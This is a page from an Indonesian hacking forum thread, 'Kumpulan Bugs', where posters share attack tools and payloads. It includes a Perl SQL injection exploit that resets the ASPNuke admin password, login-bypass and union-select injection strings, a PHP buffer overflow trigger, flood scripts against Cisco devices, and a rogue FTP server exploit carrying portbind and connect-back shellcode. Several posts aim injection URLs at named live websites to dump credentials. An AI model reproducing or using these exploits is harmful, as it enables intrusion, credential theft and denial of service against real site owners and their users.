Page 5 of 7
Re: Kumpulan Bugs
Posted: Fri Jan 15, 2010 12:20 pm
by Digital Cat
Exploit untuk ASPNuke dan ASP Portal
Code: Select all
#!/usr/bin/perl
######################################################################################
# Organization Of Cat
######################################################################################
# Exploit untuk ASPNuke dan ASP Portal
#
# Exploit By: [email protected]
#
######################################################################################
# Terima Kasih kepada ==> Alpha_programmer , Crouz Security Team , Hat-squad security team
######################################################################################
use IO::Socket;
if (@ARGV < 1)
{
print "\n==========================================\n";
print " \n -- Digital Cat --\n\n";
print " Organization Of Cat \n\n";
print " cara gunakan:ASPNuke.pl <Victim> \n\n";
print "==========================================\n\n";
print "Contoh:\n\n";
print " ASPNuke.pl www.victim.com \n";
exit();
}
my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "koneksi terputus ke $host" }
print "[+]Terhubung\n";
$addr = "GET /module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'%20,%20username='trapset'%20where%20userID=1%20-- HTTP/1.0\n";
$addr .= "Host: $host\n\n\n\n";
print "\n";
print $remote $addr;
print "[+]Sedang diproses...";
sleep(5);
print "melakukan proses pergantian password ...\n";
print "[+]OK , Sekarang mau loginnya dengan apa,silahkan konfirmasi : \n";
print "Username: trapset\n";
print "Password: trapset\n\n";
Okey…
Re: Kumpulan Bugs
Posted: Fri Jan 15, 2010 12:31 pm
by Digital Cat
Multiple SQL Injection Vulnerability
Injection pada :
- projects.php;
contacts.php;
users.php;
types_authors.php;
bibliographies.php;
types_projects.php;
types_languages.php;
types_countries.php;
Code :
Demo :
Vulnerable function:
Code: Select all
function get_vatitle($idregister,$idregistervalue,$nameregister,$tableregister,$pretitle) {
$vartitle = "SELECT $nameregister FROM $tableregister WHERE ($idregister=$idregistervalue)";
$vartitle = mysql_query($vartitle) or die("error functions_queries line 4");
$vartitle = mysql_fetch_array($vartitle);
extract($vartitle);
$title = $pretitle." » ".$$nameregister;
return $title;
}
Key….
Re: Kumpulan Bugs
Posted: Fri Jan 15, 2010 12:34 pm
by Digital Cat
Powered by BKWorks ProPHP Version 0.50 Beta 1
Login as :
Code: Select all
Username : admin ' or ' 1=1
Password : anything or nothing
And you will be logged in.
Live Demo
Key…
Re: Kumpulan Bugs
Posted: Sat Jan 16, 2010 11:01 am
by Digital Cat
Bugs Online v2.14 Sql Injection
Download :
http://sourceforge.net/project/showfile ... p_id=42528
Bug :
Code: Select all
http://[site]/help.asp?stype=-999'%20union%20select%200,suser_name,spassword%20from%20tblusers%20where%20'1
Key…
Re: Kumpulan Bugs
Posted: Sat Jan 16, 2010 11:03 am
by Digital Cat
noticias.php
Victim :
www.caindependiente.com
Link :
www.caindependiente.com/cms/noticias.php
Code: Select all
union+all+select+0,1,2,3,concat%28usuario,0x3a3a,pass%29,5,6,7,8,9+from+usuarios—
Demo:
http://www.caindependiente.com/cms/noticias.php?id=-1+union+all+select+0,1,2,3,concat%28usuario,0x3a3a,pass%29,5,6,7,8,9+from+usuarios--
Login :
http://www.caindependiente.com/cms/login.php
key…
Re: Kumpulan Bugs
Posted: Sat Jan 16, 2010 11:04 am
by Digital Cat
Apache 2.2.11 Shutdown/PHP 5.2.8 Buffer Overflow
Target :
Greetz :
Code :
Code: Select all
<?php
$FTW = str_repeat("A",1992);
com_print_typeinfo($FTW);
echo "Digital Cat.";
?>
Key…
Re: Kumpulan Bugs
Posted: Sat Jan 16, 2010 11:06 am
by Digital Cat
Flood Cisco CSS tipe 11000, 11050,11150,11800
Programming language : perl
Code: Select all
#!/usr/bin/perl
use Net::RawIP;
$s_addr = $ARGV[0];
$vic = $ARGV[1];
print "\Digital Cat ([email protected])\n";
if(!$ARGV[1]){
die "Cara pengunaan: perl $0 <source address> <victim>\n";
}
@ports =(1..1024);
sub packet{
print "My Cat now commencing with packetting..\n";
$port= shift(@ports);
$p = new Net::RawIP;
$p->set({ip => {saddr => $s_addr,daddr => $vic},
tcp => {source => 31337,dest => $port,psh => 1, syn => 1}});
$p->send(0.05,150);
}
for($i=0;$i<10;$i++){
packet;
}
Key…
Re: Kumpulan Bugs
Posted: Sat Jan 16, 2010 11:07 am
by Digital Cat
Flood Cisco Tipe 677
Programming language :
Perl
Target Port :
23
Service :
Telnet Server
Code :
Code: Select all
#!/usr/bin/perl
use IO::Socket;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s})){&usage; }
$serv = $args{s};
$foo = "?????????????????a~ %%%%%XX%%%%%"; $number = 30000;
$data .= $foo x $number; $EOL="\015\012";
$remote = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $args{s},
PeerPort => "(23)",
) || die("Service Telnet tidak ditemukan! on $args{s}\n");
$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nMengirim Packets\n");
sub usage {die("\n$0 -s <server>\n\n");}
Key…
Re: Kumpulan Bugs
Posted: Sat Jan 16, 2010 11:08 am
by Digital Cat
PoC exploit freebsd
Target :
- IglooFTP (FreeBSD 4.7)
cftp (FreeBSD 4.7)
Moxftp (FreeBSD 4.7)
cftp (FreeBSD 5.0)
IglooFTP (FreeBSD 5.0)
Moxftp (FreeBSD 5.0)\n"
Code :
Code: Select all
#!/usr/bin/perl
use IO::Socket;
sub convert_ret {
my($ret) = @_;
for ($x=8; $x>0; $x=$x-2){
$ret = substr($ret_temp,$x,2);
$new_ret .= chr hex "$ret";
}
return $new_ret;
}
sub convert_ip {
my($ip) = @_;
@ip_tmp = split(/\./, $ip);
for($x=0; $x<4; $x++) {
$new_ip .= chr @ip_tmp[$x];
}
return $new_ip;
}
$server_port = 21;
$passive_server_port = 10324;
unless(@ARGV == 3 || @ARGV == 2)
{ die
"Penggunaan ./DSR-ftp_clients.pl Shellcode Client Ip\n
\tShellcode:\t0 = Portbind
\t\t\t1 = Connect back\n
\tClient:\t\t0 = IglooFTP (FreeBSD 4.7)
\t\t\t1 = cftp (FreeBSD 4.7)
\t\t\t2 = Moxftp (FreeBSD 4.7)
\t\t\t3 = cftp (FreeBSD 5.0)
\t\t\t4 = IglooFTP (FreeBSD 5.0)
\t\t\t5 = Moxftp (FreeBSD 5.0)\n"
}
($shellcode_arg, $client_arg, $extra_arg) = @ARGV;
$user_ip = convert_ip($extra_arg);
@shellcode_list = (
"Portbind,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80",
"Connect Back,\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68"."$user_ip"."\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80");
@client_list = (
"IglooFTP - FreeBSD 4.7,188,0xbfbfc560,0",
"cftp - FreeBSD 4.7,8192,0xbfbffb04,1,300",
"mftp - FreeBSD 4.7,516,0xbfbff8e0,1,100",
"cftp - FreeBSD 5.0,8196,0xbfbffa30,1,300",
"IglooFTP - FreeBSD 5.0,212,0xbfbfc440,0",
"mftp - FreeBSD 5.0,532,0xbfbff950,1,100");
@client_info = split(/,/,@client_list[$client_arg]);
@shellcode_info = split(/,/,@shellcode_list[$shellcode_arg]);
print "\tDSR-ftp_clients by Digital Cat\n
Setting up Service on Port: $server_port
Client: @client_info[0]
Using Shellcode: @shellcode_info[0]
Using Offset: @client_info[2]\n";
$shellcode = @shellcode_info[1];
$shellcode_length = length($shellcode);
$nop_count = @client_info[1] - $shellcode_length - 8;
$nops = "\x90"x$nop_count;
$ret_temp = @client_info[2];
$ret = substr($ret_temp,2,8);
$ret = convert_ret($ret);
$ret = "$ret"x2;
if(@client_info[3] eq "1") {
$nops_x = "\x90"x@client_info[1];
$nops_y = "\x90"x@client_info[4];
$exploit_string = "$nops_x"."$ret"."$nops_y"."$shellcode";
}
if($client_arg == 0 or $client_arg == 4) {
$exploit_string ="total 666
drwxr-xr-x 25 root wheel 1536 Jan 28 00:13 .
drwxr-xr-x 14 root wheel 512 Jan 28 00:13 ..
-rwxr-xr-x 2 digital_cat digital_cat 512 Jan 29 01:00 $nops$shellcode$ret";
}
$server = IO::Socket::INET->new(LocalPort => $server_port,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10)
or die "My Cat Can't listen on $server_port : $!\n";
while ($client = $server->accept()) {
if(@client_info[3] == 1) {
print $client "220 $exploit_string\n";
}
if(@client_info[3] eq "0") {
print $client "220 0xdeadcode\n";
while($request !=~ /QUIT/i) {
$request = <$client>;
print $request;
if($request =~ /PASS/i) {
print $client "230 User anonymous My Cat logged in.\n";
}
if($request =~ /USER/i) {
print $client "331 Anonymous Password required for My Cat.\n";
}
if($request =~ /SYST/i) {
print $client "215 UNIX Type: L8\n";
}
if($request =~ /REST/i) {
print $client "350 My Cat Restarting.\n";
}
if($request =~ /TYPE/i) {
print $client "200 My Cat Type set to A.\n";
}
if($request =~ /PWD/i or $request =~ /FEAT/i) {
print $client "257 \"/usr/home/digital_cat/\" is current directory.\n";
}
if($request =~ /PASV/i) {
$passive_server = IO::Socket::INET->new(LocalPort => $passive_server_port,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10)
or die "My Cat Can't open passive port";
print $client "227 My Cat Entering Passive Mode (127,0,0,1,40,84)\n";
}
if ($request =~ /LIST/i) {
while($passive_client = $passive_server->accept()){
print $client "150 My Cat Starting transfer.\n";
print $passive_client $exploit_string;
close $passive_client;
print $client "226 BANG My Cat DEAD!!!\n";
}
}
}
close $client;
}
}
Re: Kumpulan Bugs
Posted: Sat Jan 30, 2010 7:03 am
by Muhammad_ibl
Ne ada beberapa bug SQL Injection..Mudah-mudahan dapat menjadi bahan referensi..
Code: Select all
http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28table_name%29
%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Code: Select all
http://www.santika.com/news.php?id=-37%20union%20select%201,2,3,group_concat%28column_name%2
9%20from%20information_schema.columns%20where%20table_name=0x6d656d62657273686970--
Code: Select all
http://www.skw.co.id/news.php?id=-91%20union%20select%201,group_concat%28table_name%29,3,4,5
%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Code: Select all
http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28bb_username,0x3a,b
b_password%29,3,4,5,6,7,8%20from%20bb_users--
Code: Select all
http://www.milim.com/news.php?id=-100%20union%20select%201,group_concat%28username,0x3a,pass
word%29,3,4,5,6,7,8%20from%20cms_users--